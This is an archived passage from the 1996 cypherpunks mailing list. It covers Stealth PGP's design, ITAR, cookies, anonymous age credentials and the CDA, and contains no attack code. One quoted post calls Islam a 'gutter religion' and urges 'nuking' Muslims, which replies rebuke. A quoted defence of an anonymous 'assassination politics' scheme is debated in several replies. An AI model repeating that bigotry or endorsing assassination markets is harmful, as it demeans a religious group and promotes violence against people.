e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 15 Feb 1996 15:21:45 +0800
To: cypherpunks@toad.com
Subject: FW: Laugh Of The Day - Fri, Feb 02 1996 (fwd)
Message-ID: <v02120d08ad4820f58402@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "Roger Koppl" <KOPPL@FDUSVR1.FDU.EDU>
Organization:  FAIRLEIGH DICKINSON UNIVERSITY
To: austrianecon@agoric.com
Date:   Wed, 14 Feb 1996 12:38:57 EDT
Subject:       FW: Laugh Of The Day - Fri, Feb 02 1996 (fwd)
Priority: normal
Sender: owner-austrianecon@agoric.com
Precedence: bulk
Reply-To: AustrianECON@agoric.com

I got this from a colleague.  Apparently the source is LaughWEB.

Sound familiar?

Roger
---------- Forwarded message ----------
*****************************************************************
        Be sure to visit LaughWEB
(http://www.misty.com/laughweb/)
*****************************************************************
*File Description: The Natural Life Cycle Of a Mailing List*

THE NATURAL LIFE CYCLE OF MAILING LISTS

Every list seems to go through the same cycle:

1.  Initial enthusiasm (people introduce themselves, and gush alot about
how wonderful it is to find kindred souls).

2.  Evangelism (people moan about how few folks are posting to the list,
and brainstorm recruitment strategies).

3.  Growth (more and more people join, more and more lengthy threads
develop, occasional off-topic threads pop up).

4.  Community (lots of threads, some more relevant than others; lots of
information and advice is exchanged; experts help other experts as well as
less experienced colleagues; friendships develop; people tease each other;
newcomers are welcomed with generosity and patience; everyone -- newbie
and expert alike -- feels comfortable asking questions, suggesting
answers, and sharing opinions).

5.  Discomfort with diversity (the number of messages increases
dramatically; not every thread is fascinating to every reader; people
start complaining about the signal-to-noise ratio; person 1 threatens to
quit if *other* people don't limit discussion to person 1's pet topic;
person 2 agrees with person 1; person 3 tells 1 & 2 to lighten up; more
bandwidth is wasted complaining about off-topic threads than is used for
the threads themselves; everyone gets annoyed).

6a. Smug complacency and stagnation (the purists flame everyone who asks
an 'old' question or responds with humor to a serious post; newbies are
rebuffed; traffic drops to a doze-producing level of a few minor issues;
all interesting discussions happen by private email and are limited to a
few participants; the purists spend lots of time self-righteously
congratulating each other on keeping off-topic threads off the list).

OR

6b. Maturity (a few people quit in a huff; the rest of the participants
stay near stage 4, with stage 5 popping up briefly every few weeks; many
people wear out their second or third 'delete' key, but the list lives
contentedly ever after).

******************************************************************************
LAUGH OF THE DAY - A service of LaughWEB (http://www.misty.com/laughweb/).

To subscribe, send e-mail to majordomo@world.std.com, with text:
     subscribe lotd email_address
To subscribe to lotd, point your web browser to:
     http://world.std.com/~joeshmoe/laughweb/lotd_subscribe.html


----------------------------------------------------------------------
Roger Koppl
Associate Professor
Economics and Finance
Fairleigh Dickinson University
Madison, NJ 07940
USA

Internet: Koppl@fdusvr1.fdu.edu
Phone:  (201) 443-8846
Fax: (201) 443-8804
----------------------------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Date: Thu, 15 Feb 1996 19:36:44 +0800
To: tcmay@got.net
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <199602150328.AA08186@sunstorm.corp.cirrus.com>
MIME-Version: 1.0
Content-Type: text/plain


> From owner-cypherpunks@toad.com Tue Feb 13 10:34:37 1996
> To: "Timothy C. May" <tcmay@got.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Online Zakat Payment: Religious tithe.
> In-Reply-To: <ad4541d1000210045325@[205.199.118.202]>
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Content-Length: 971
> X-Lines: 20
> 
> On Mon, 12 Feb 1996, Timothy C. May wrote:
> 
> > At 10:07 PM 2/12/96, Steven C. Perkins wrote:
> > Once again, the gutter religion of Islam reveals the derangement of its
		^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > so-called Prophet.
> > 
> > The world really needs to get around to nuking these folks.
> > 
> Oh, Come now!  Islam may in its present form be a religion deeply hostile 
> to liberty.  But since "nuking" the whole Islamic world would not be 
> itself much of a defence of freedom, the only long term answer is to 
> promote within Islam the same kind of Reformation as eventually made 
> Christianity half decent.  And Tim's comments do not contribute to that.  
> I don't know how many internet servers there are in the Middle East.  
> But, if I were an intelligent fundamentalist, I'd be copying it all over 
> the place.  "Look", I'd be saying, "these people really do mean another 
> crusade to destroy us and our faith".
> 
> I can understand Tim's disgust with these people.  But I do question his 
> manner of expressing it.
> 

Actions of certain individual or group does not reflect what the actual
religion is. Examples of this can be found on every religion. 

Somebody generalizing as above reflects his/her own closed/blocked mentality.

Look at yourself, if you can fall to such degrading levels and since you 
happen to be a member of this mailing list, it is not ration to think as
every cpunks as demented as you are.

Ashfaq Ahmed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 16 Feb 1996 21:39:07 +0800
To: warlord@MIT.EDU
Subject: Re: Stealth PGP work
In-Reply-To: <199602141830.NAA02458@toxicwaste.media.mit.edu>
Message-ID: <11009.9602141935@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins <warlord@mit.edu> writes on cpunks:

> I'm not familiar with the exact details of what stealth does, which is
> why I asked for more details.  

OK stealth is quite simplistic in the way it operates... neglecting
the pgp conventional encrypt support, here's what it does...

It takes a PGP message which looks like this (must be unarmored),

+---------+--------------------------------+----------+----------
| rsa CTB | RSA encrypted IDEA session key | IDEA CTB | IDEA encrypted data ..
+---------+--------------------------------+----------+----------

and outputs this:

+--------------------------------+---------------------+
| RSA encrypted IDEA session key | IDEA encrypted data |
+--------------------------------+---------------------+

(the point of stealth 2.01 is that the RSA encrypted session keys for
a given user will be less than that users RSA modulus by definition,
and hence not evenly distributed, and that this would be noticeable
statistically after a few messages)

So in stealth 2.01 the RSA encrypted IDEA session key is actually
transformed by a function on stealthing, and the reverse of that
transform is applied on unstealthing.  Before the transform:

0 < r < n

where r is the encrypted session key, and n is the users public key.

The transform ensures that, f(r) is uniformly distributed in:

0 < f(r) < 2^x 

(x depends on a security parameter, higher security implies greater
expansion, 2^x is of course greater than n, otherwise information
would be lost)

stealth 2.x requires n to perform the transform f, and the inverse f'.
when stealthing the n chosen is that specified in the RSA header.

on unstealth f' is used to recover, and n is again required, the n
chosen must be either specified as a user id to look up, or all
user-ids must be inspected.

The unstealth operation re-constructs the headers.

(One "feature" is that you can pad random junk after the stealthed
message and the unstealth, pgp decrypt operation still seems to work
because of the nested length bytes contained within IDEA encrypted and
within compression packets.  This is useful as it allows you to pad
your data to a fixed size in a similar way to mixmaster packets).

> The problem is that PGP API, when decrypting a message, keys off the
> PGP packet types in order to operate.

Right, understood.  I would have thought it nice to add support for
usage of the modules in the pipeline that you describe in an
independent manner also, as building blocks?  Perhaps this is already
catered for.  The problem with stealth from this point of view though
is that there is no packet.  Perhaps you could prime the pipeline by
prepending a dummy `stealthed' CTB, and a method to cope with this CTB?

> If stealth can work outside of PGP 2.6.2, then it should be possible
> to add it on to PGP 3, theoretically.

Stealth can work outside of PGP, but it duplicates work - it looks up
keys in the database to obtain the keyid to insert on unstealth (and
in 2.01 it also needs to know the rsa modulus on stealth and
unstealth).  The other functionality 2.01 duplicates is that it needs
cryptographically strong random numbers, I have not resolved this
satisfactorily, which is why stealth2.x has not be developed further
than beta stage.

The limitation of stealth is that it only supports a single recipient,
in that it expects the data following the key to be the IDEA encrypted
data.

Possibly pgp3 will make this easier, will give access to the random
number generator as an API call?

Will it provide API calls to allow key lookup?

(Maybe I should hold off more questions until you have the API ready
for release).

> [...]  To add stealth, you just add a stealth module in there.
> However I can tell you now that we are not working on such a module
> for the PGP 3.0 release.
>
> I'll hopefully have the API Spec and Programmer's Guide in a state
> where I can let others see it in the near future.  But since I'm going
> to be off the net for about a week or two at the end of the month, it
> might have to wait until March unless a miracle happens in the next
> week.

Perhaps you can accept a donated stealth module at a later stage, if I
understand the API spec and prog guide well enough I might try to
produce one of these .  I'm sure Colin & yourself have lots to do as
is.

> I hope this helps.

Clarifies quite a few things, yes thanks,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 15 Feb 1996 19:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: PING packets illegal?
Message-ID: <199602150341.TAA16668@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some entity that called itself "Mark M." appears to have said:

> On Tue, 13 Feb 1996 anonymous-remailer@shell.portal.com [me] wrote:
 
>> that ...... but if those ping packets contained little pieces of something
>> like PGP ...... would the host being pinged be breaking the law? Would

> Exporting encryption to the U.S. from another country is not illegal, only
> exporting from the U.S. is.  The method of transmissioni is irrelevant.  It
> does not matter if TCP packets or ICMP-ping packets are used to transmit the 
> data. 

That wasn't my point. I was talking about the host being pinged. Would 
that host be breaking ITAR regulations by sending those evil 
PGP-containing packets *back* to the foreign host?

> the destination are violating the law.  Since it is impossible to monitor the
> contents of every packet being transmitted over a network, I seriously doubt
> that any intermediate host would be considered to be in violation of ITAR.

Impossible, maybe. But that doesn't mean it can't be illegal. Take the 
CDA, for example. Fuck. Oops, Exon will be displeased. Am I going to be 
taken to jail? Most likely not. Was it illegal? Technically, yes.

Thanks,

Michael Ellis
<mellis@alpha.c2.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSKhUQqs/Oe38tFJAQGPLgP/WDwoyj9qNZp7BznEyvQ8tdiGwZUb7xY0
HvfopqkD9p2oLHqRTBIbBZnSfGnQxmBwj/nTOaoWRWb8SvEWYmgT9AIVaOtNd2BW
dqHoHGbc100o1yNUgY1YC5i09jQW668Np7zr82Vdt8uNnFIROH7Tl9wXO6uxYnGw
Wd041hx3PrM=
=25Ah
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shauert@primenet.com (Scott A. Hauert)
Date: Fri, 16 Feb 1996 14:41:09 +0800
Subject: Re: Windows PGP mail reader
In-Reply-To: <4eaksb$6i9@recepsen.aa.msen.com>
Message-ID: <4fu82h$n0g@nnrp1.news.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


m.purcell@navy.gov.au (LEUT Mark Purcell) wrote:

>In article <4eaksb$6i9@recepsen.aa.msen.com>, jims@conch.aa.msen.com says...
>>
>>Hi.  Can anyone recommend a Windows based email/POP3 reader that can decrypt
>>content?  Please reply  via email:

If you are looking for a program that can log into your pop server,
scan for PGP messages, retrieve and decrypt them, then try Private
Idaho.  If you are looking for some combination of programs that can
handle your e-mail and provide PGP functions, then there are lots of
option.

Take a look at:
http://www.primenet.com/~shauert

There is a collection of PGP front-ends for Windows, many of which do
what you seem to be looking for.

Scott
Scott Hauert

Internet: shauert@primenet.com
Compuserve: 76342,1400
WWW: http://www.primenet.com/~shauert/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Feb 1996 20:05:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [ASSASSINATION NOISE] Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602150411.UAA07780@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 AM 2/13/96 -0800, you wrote:

>The Rushdie incident is simply so far removed from "Assassination Politics" 
>that it can't possibly be used to refute it; I still believe it actually 
>demonstrates how much effort somebody has to go to, to protect a targeted 
>person.  One targeted person is easy to protect.  10,000 would be FAR 
>harder.  And the moment a few of those guys got "whacked," the rest would 
>want to resign their jobs and hope they would be allowed to retire in peace.

Rushdie is just low on your target list.  I agree that it's much harder
to protect 10,000 people (say the Iranians put out a contract on Baha'is
and other heretics, at $X/head...) but it's still abusable.  Maybe the
Anonymous Captains of Industry put out a contract on strike leaders.

>From a cypherpunks perspective, yes you could run an assassination lottery,
though it might be hard for the assassin to collect - how do you prove
that _you_ were the hit man, and not merely the nearest person to a phone
after it happened?  How do you prevent an anonymous escrow agency from refusing
to deliver the cash?  Some of the protocols may be difficult to work out.


Meanwhile
        WANTED, DEAD OR ALIVE
        JIM BELL
        REWARD 13 demo-cyberbucks

An assassination-sponsoring society is _not_ a polite society.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 15 Feb 1996 18:42:08 +0800
To: cypherpunks@toad.com
Subject: Re: Response to Perrygram
In-Reply-To: <199602140212.VAA22242@jekyll.piermont.com>
Message-ID: <q9FBJD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Keeping appropriate postings in appropriate places is much like trying
> not to park in such a way as to take up two spaces, trying not to
> track mud into your apartment building, or other forms of good
> citizensship. It isn't required, no law forces you to do it, but
> everyone who isn't an asshole tries to follow the social conventions
> because it makes life for everyone. Yes, its your right to park such
> that no one can fit in behind or ahead of you, but is it something you
> really should be doing?

The protocols for both Usenet and the open mailing list were designed with the
assumption that the posters will follow the rules and post into "appropriate"
forums. This sort of worked 10 years ago, when I started reading Usenet, but
clearly doesn't work anymore. People should be free to post anything they want
anywhere they want. As more and more posters excercise this right, the readers
lose the right not to have their time wasted by the traffic they don't want to
see. A good friend of mine called this "the right to non-association". It's an
imporant part of one's privacy. While we have some technical people left on
this mailing list, perhaps we can discuss technical solutions to this problem?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Feb 1996 21:01:43 +0800
To: cypherpunks@toad.com
Subject: Re: COO_kie
Message-ID: <199602150420.UAA09695@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 AM 2/13/96 -0800, Jeff Weinstein <jsw@netscape.com> wrote:
>  There is a lot of confusion about cookies.  They do not allow
>a web site to access private information such as the user's
>e-mail address or other preferences as was recently reported
>in Web Review.  They only store information that the web site
>already has.  If you never give a web site private information
>about you or your identity, they will not be able to match your
>access patterns to your identity.

What the cookie mainly does is allow a normally stateless server to
maintain state while using a normally stateless protocol, letting
the client machine store the state data at the cost of some extra
transmission and parsing.  If the cookie data is kept separate
for separate web pages, this gives you more privacy than having the
server keep the same information, since you can see it and maybe
change it.    (The documentation indicates that you _can_ do that,
but it looks like the amount of separation you get depends on
the cookie-generating-user's choices of options.) 

As a separate note, it looks like cookies will be bitten by the Year 2000
glitch; anybody who bakes cookies between now and late 1999 that
wants them to expire early in 2000 should probably just give up
and go for 12/31/99 expiration....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Thu, 15 Feb 1996 22:50:24 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: Linux on the Mac
In-Reply-To: <199602141521.KAA24196@jekyll.piermont.com>
Message-ID: <Pine.3.89.9602142026.H32393-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Perry E. Metzger wrote:

> Clay Olbon II writes:
> > In the latest PowerPC news it is reported that OSF is porting Linux to the
> > Mac with the support of Apple.  Apple has a web site -
> > www.mklinux.apple.com that discusses this and has a link to the OSF site.
> > In my book, this is a GoodThing(tm).  Of course, being a huge fan of both
> > the Mac and unix might put me in the minority ;-)
> 
> I hate to ask this, but why does this have an impact on cryptography?

It's intuitively obvious to even the most casual observer what the 
connection is.  I guess you're not as smart as you think you are.

Ed "I'm not as think as you drunk I am!" Carp
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 15 Feb 1996 18:25:12 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Re: anonymous age credentials, sharing of
Message-ID: <ad47e0d10b0210043ce0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:38 PM 2/14/96, Michael Froomkin wrote:
>Suppose Alice is a CA who issues anonymous age credentials.
>Bob is 15
>Carol is 25
>
>Carol gets a legitimate anonymous age credential from Alice bound to an
>anonymous public key generated for this purpose.  Carol then gives the
>key pair to Bob.  Bob uses to do things only adults are legally permitted
>to do.  (It's not bound to Carol's everday keypair because that's not
>anonymous....)
>
>What can stop Bob and Carol from subverting a scheme that relies on
>anonymous age creditials in this manner?

Nothing, except biometric methods (fingerprints, retinal scans, electronic
signatures (the pen type), DNA, etc.) That is, if the credential is
transferrable by transfer (not a syllogism), then it can be transferred.
If, however, the credential needs some input from a local biometric input
device, then this makes it harder to transfer the credential.

Unless the biometric device is bypassed....

(Likewise, Carol could log on to the illegal activity and "let Bob watch."
Another form of bypassing viewing credentials.)

>If the answer is "nothing" this might mean that purveyors of "adult"
>material might have no defense against a law requiring that they collect a
>True Name + age creditential....

There are interesting questions here....mostly I think of the "True Name"
as only another credential, but this is a complicated argument to make, and
I don't have the time right now.

(Also, Perry is even now composing a "what does this have to do with
cryptography?" perrygram.)

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Markus L. Noga" <mlnoga@mail.hh.provi.de>
Date: Thu, 15 Feb 1996 17:37:03 +0800
To: cypherpunks@toad.com
Subject: Re: PING packets illegal?
Message-ID: <199602150139.UAA06100@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think there is an implementation of IDEA called TinyIDEA that will fit 
in <512 bytes. Why don't you try it?

- -- 

Markus L. Noga <mlnoga@mail.hh.provi.de>
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSKO0ioZzwIn1bdtAQFXjAF9HIqkY59gp351Yv6ud8S6ZpxjvNaTh7NZ
rFSKNhly3uebjgN+mav7AewZ0wMtCuXW
=gg2N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Thu, 15 Feb 1996 18:58:50 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <Pine.SUN.3.91.960214163300.4373A-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9602142031.M32393-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Jon Lasser wrote:

> Several people have posted to the list that the Chinese, censored, 
> Internet will fail. Usually, the claim is that the censored network will 
> fail mostly because of technical reasons, namely the inability of the 
> Chinese government to censor everything. The other significant claim made 
> was that the Chinese problem is "behind" the "firewall" leading into the 
> country... Suggestions have been made that RSA is involved with China to 
> implement this censorship.

I think it *will* work, in part because China has a very long history of
repressing and persecuting its own people.  Besides, if they really get in
a tight spot, there's always "the nuclear option." 

If you think I'm kidding, read the news about China threatening to nuke
Taiwan if they declare independence. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 15 Feb 1996 22:28:25 +0800
To: <cypherpunks@toad.com>
Subject: [S1567] Leahy vs CDA
Message-ID: <v03004c00ad486bf8fa2d@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


[This was Senator Leahy's reply to my mail to him on the CDA. -dave ]

>From: Senator_Leahy@leahy.senate.gov
>Date: Wed, 14 Feb 96 15:52:36 EST
>To: ddt@lsd.com
>Subject: Rule: Re: Thanks, Senator
>
>I really appreciate getting your message about the so-called
>"Communications Decency Act."
>
>On February 9, I introduced S. 1567, a bill to repeal this misguided
>attempt to censor the words used and topics discussed on the Internet. You
>can find the text of the bill and a copy of my full statement at:
> <http://www.senate.gov/member/vt/leahy/general/protect.html>
>
>Rather than use the heavy hand of government censorship, I believe we
>should encourage parents to use the growing number of technical tools
>available to control what their children may access on-line.
>
>We have a long, hard struggle ahead of us to reverse this misguided law. I
>am heartened and encouraged by the outpouring of support from Internet
>users all over the country in support of my efforts to protect our First
>Amendment rights when we go on-line. We must all keep working to convince
>a majority of Senators that we need to approach this whole issue
>rationally and sensibly. Grassroots support like yours is important to
>make this happen.
>
>Please stay in touch.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 15 Feb 1996 18:04:09 +0800
To: cypherpunks@toad.com
Subject: Re: Assasination Politics
Message-ID: <9602150158.AA01906@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>I understand your concern.  I wish there was some simple argument I could 
>give which would assuage your fears.  However, I look at it this way:  The 
>Federal government (and all other governments, around the world) are 
>curently parasites on the rest of the population.  Now "parasite theory" is 
>that the parasite has some sort of optimum "parasite level" above which he 
>cannot go.   Once the cost for such parasitism is removed, there will be an 
>economic boom for those "hosts" of the parasite.  Naturally, the parasite 
>will be in trouble, but that's only justice.

One thing you have to assess, is: what is the percentage of the population who
longs for a 'free lunch'.  And also, how much money is a big company willing to 
subsidise the predictor of the 'suicide' of a new competitor (the case of the 
lone inventor with patents rights and a revolutionary invention).  If you 
underestimate this number, you (or other like-minded peoples) might very well 
end up on the exit end of a gun barrel...

But anyways, if I were you, I'd watch my back.  The spooks are probably already trying
to figure out a way out of it.

JFA

**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@UNiX.asb.com>
Date: Thu, 15 Feb 1996 22:50:31 +0800
To: cypherpunks@toad.com
Subject: Re: The Internet Party
Message-ID: <199602150155.UAA06200@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian D Williams wrote:
[..]
> <bright idea!>Looks pretty dim to me.
 
> Say, why not pick our own candidate?
> Why not form our own Party?
> The Internet party........
> It would be the ultimate write in campaign.
> Now all we need is a candidate who stands for free speech, personal
> privacy and the right to encrypt.......Just as bad as people who vote for ONE issue like abortion or civil 
rights or NAFTA/GATT and ignore everything else.  These are important 
issues, but they aren't the only ones.  And any support from netters will 
fall after arguing about everything else.

...and the sad thing is you might well shoot yourself in the foot for 
voting against somebody over one or two issues.  I know people who'd vote 
for anybody but Clinton.  They babble about Clinton being a "socialist" 
<chuckle> so much that they'd end up voting for a National Socialist <not 
funny either...!>

> "I nominate John Perry Barlow. Who will second the nomination?"I nominate Frank Zappa. The music's better and dead presidents don't cost 
as much to maintain.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSKSfyoZzwIn1bdtAQEr7gF/enFcC7CX8islsCHJ9BHdWa3SAvmvxlZh
Nd39qds0s0D5gjRcEoKTu9wiHCmIOqaU
=aKJh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Feb 1996 18:06:03 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks in 3/96 WIRED -\"Wisecrackers\" by Steven Levy
Message-ID: <199602150157.UAA26692@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Indeed, congrats Steven, a swell, crackerjack story well told.


Flattering exhibits of Damien and DW.


Ponder the garish payback frontis-pieces announcing Steven's 
tale of "a throbbing collaborative network of potential 
crackers -- and, maybe, thieves and saboteurs." 


Steven, your credit sez the next book is "Crypto," about the 
revolution in cryptography.


Can you give a date for publication?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Feb 1996 20:35:08 +0800
To: Brian D Williams <talon57@well.com>
Subject: [NOISE] Re: The Internet Party
Message-ID: <199602150525.VAA11247@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 2/14/96 -0800, Brian D Williams <talon57@well.com> wrote:
>If I see one more ad for some dumb ass 
>politician running for president I'm going to puke.
><bright idea!>
>Say, why not pick our own candidate?
>Why not form our own Party?
>The Internet party........
Because there's way too little for us to agree on outside of
Internet issues; it's like forming the Pro- or Anti- Abortion Party,
or the Womens' Party or whatever.

>It would be the ultimate write in campaign.
>Now all we need is a candidate who stands for free speech, personal
>privacy and the right to encrypt.......
>"I nominate John Perry Barlow. Who will second the nomination?"

For a write-in candidate, you don't _need_ a second.  Just put it
in your .signature file and see what happens.  On the other hand,
John's a Republican, and they desparately need _somebody_ as a candidate :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: medea@alpha.c2.org (Medea)
Date: Thu, 15 Feb 1996 20:51:02 +0800
To: cypherpunks@toad.com
Subject: Re: CyberAngels
Message-ID: <199602150530.VAA00423@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Declan sez:

>I fear the so-called "CyberAngels" more than I do the Feds. At >least with their brand of jackboots, there can be >accountability.
>
>The CyberAngels are more like CyberCads, CyberFrauds, or >CyberCriminals.

  While Declan makes a good point, I wouldn't worry too much about the CyberAngels a/k/a the CyberAsses.
  As we all know, the group received a lot of press years ago when they started as the Guardian Angels.  They began to go downhill when it was discovered that they employed the services of those they were supposedly protecting the public against.
  Now, they're trying their hand at *protecting* the Net since, by jumping on the "decency band-wagon", they've seen an opportunity to avoid becoming defunct.
  I bet if you use the word "cryptology" in a sentence, the CyberAsses would have no idea what you were taking about.
  The bottom line is that even the orange juice industry got tired of Anita Bryant.

Medea


============================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ |---------------------------------------------| +
+ | The mind is its own place, and of itself    | +
+ | Can make a heaven of hell, a hell of heaven | +
+ |---------------------------------------------| +
+++++++++++++++++++++++++++++++++++++++++++++++++++









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hochiminh@alpha.c2.org
Date: Thu, 15 Feb 1996 21:07:47 +0800
To: cypherpunks@toad.com
Subject: Ben T. Moore "Mr. Anonymous"
Message-ID: <199602150533.VAA00583@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


<<<<Quoting Ben T. "Mr. Anonymous" Moore to Karl>>>>

BTM> Well Karl, It seems I missed your idea/solution in this post, however, some of 
BTM> us figured this out some years ago... I begin a campaign almost 10 years ago 
